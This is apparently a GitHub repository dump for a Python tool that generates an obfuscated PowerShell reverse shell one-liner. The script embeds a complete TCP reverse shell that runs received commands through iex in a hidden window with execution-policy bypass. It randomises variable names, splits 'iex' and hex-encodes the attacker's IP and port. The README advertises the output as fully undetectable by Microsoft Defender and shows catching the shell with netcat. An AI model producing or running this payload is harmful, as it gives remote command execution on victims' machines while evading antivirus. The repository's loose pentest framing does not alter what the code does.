├── LICENSE ├── PowerShell-Obfuscator.py └── README.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 deeexcee-io 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /PowerShell-Obfuscator.py: -------------------------------------------------------------------------------- 1 | import re 2 | import string 3 | import random 4 | 5 | # Accept user input for IP and port 6 | ip = input("Enter IP address: ") 7 | port = input("Enter port: ") 8 | script = "Start-Process $PSHOME\powershell.exe -ArgumentList {-ep bypass -nop $client = New-Object System.Net.Sockets.TCPClient('*LHOST*',*LPORT*);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -WindowStyle Hidden" 9 | 10 | # Open script.ps1 file in read mode 11 | #with open(file, 'r') as f: 12 | # script = f.read() 13 | 14 | # Replace all variables with random 10-character names - excluding $PSHOME 15 | var_dict = {} 16 | pattern = re.compile(r'(?!\$PSHOME)(\$[A-Za-z0-9]+)') 17 | 18 | def replace_var(match): 19 | var_name = match.group(1) 20 | if var_name not in var_dict: 21 | var_dict[var_name] = f'${"".join(random.choices(string.ascii_letters + string.digits, k=10))}' 22 | return var_dict[var_name] 23 | 24 | script = pattern.sub(replace_var, script) 25 | 26 | # Replace iex with i''ex 27 | pattern = re.compile(r'iex') 28 | script = pattern.sub("i''ex", script) 29 | 30 | # Replace PS with <:Random uuid):> 31 | pattern = re.compile(r'\bPS\b') 32 | 33 | def replace_ps(match): 34 | return f'<:{"".join(random.choices(string.ascii_letters + string.digits, k=10))}:>' 35 | 36 | script = pattern.sub(replace_ps, script) 37 | 38 | # Replace IP and port in script 39 | script = script.replace("'*LHOST*',*LPORT*", f"'{ip}',{port}") 40 | 41 | # 
Convert IP addresses to hex 42 | pattern = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b') 43 | 44 | def ip_to_hex(match): 45 | return '0x' + ''.join(f'{int(x):02x}' for x in match.group(0).split('.')) 46 | 47 | script = pattern.sub(ip_to_hex, script) 48 | 49 | # Convert Port Number to hex - Not matching 65535 50 | pattern = re.compile(r'\b(?!65535)([1-9]\d{1,3}|[1-5]\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5])\b') 51 | 52 | def port_to_hex(match): 53 | port_number = int(match.group()) 54 | hex_value = hex(port_number) 55 | return hex_value 56 | 57 | script = pattern.sub(port_to_hex, script) 58 | 59 | # Print modified script to console 60 | print(script) 61 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerShell-Reverse-Shell-Generator 2 | Obfuscated, FUD (Defender) Simple PowerShell Reverse Shell One-Liner 3 | 4 | Inspired by https://github.com/t3l3machus. Check out his awesome tools and videos. All credit from this goes to me watching one of his videos. 5 | 6 | # PowerShell-Reverse-Shell-Generator 7 | Obfuscated Reverse Shell Generator - Uses the standard PS one-liner and obfuscates the payload. Unique string each time to evade detection. 8 | 9 | FUD (Fully Undetectable - Defender) @ 11/04/2023 10 | 11 | ## Features 12 | * Generates a PowerShell Reverse Shell one-liner which bypasses Defender. 13 | * Randomly assigns variable names 14 | * IP Address and Port Number are converted to Hex. 15 | * Random ID is given to each Shell Prompt 16 | * Accepts user input for the remote host IP address and port. 17 | 18 | ### Installation 19 | 20 | Clone the repository: 21 | ```bash 22 | git clone https://github.com/deeexcee-io/PowerShell-Reverse-Shell-Generator.git 23 | ``` 24 | 25 | ### Usage 26 | 1. Run the `PowerShell-Obfuscator.py`script 27 | ```bash 28 | python3 PowerShell-Obfuscator.py 29 | ``` 30 | 2. 
When prompted, enter the IP address and port 31 | 3. The script will output the obfuscated PowerShell payload. 32 | 33 | Drop in PowerShell 34 | 35 | ![image](https://user-images.githubusercontent.com/130473605/231182450-104da572-f0d7-4d92-b882-e7a573593dc2.png) 36 | 37 | Set up NC and catch the shell 38 | 39 | ![image](https://user-images.githubusercontent.com/130473605/231182534-31880e1c-a689-48f1-8b15-f75a9afaec76.png) 40 | 41 | 42 | Made with <3 by myself and chatgpt. 43 | 44 | I am not a developer in any way, shape or form. I pentest and use other people's code/chatgpt. I ask chatgpt questions and it gives me answers. 45 | --------------------------------------------------------------------------------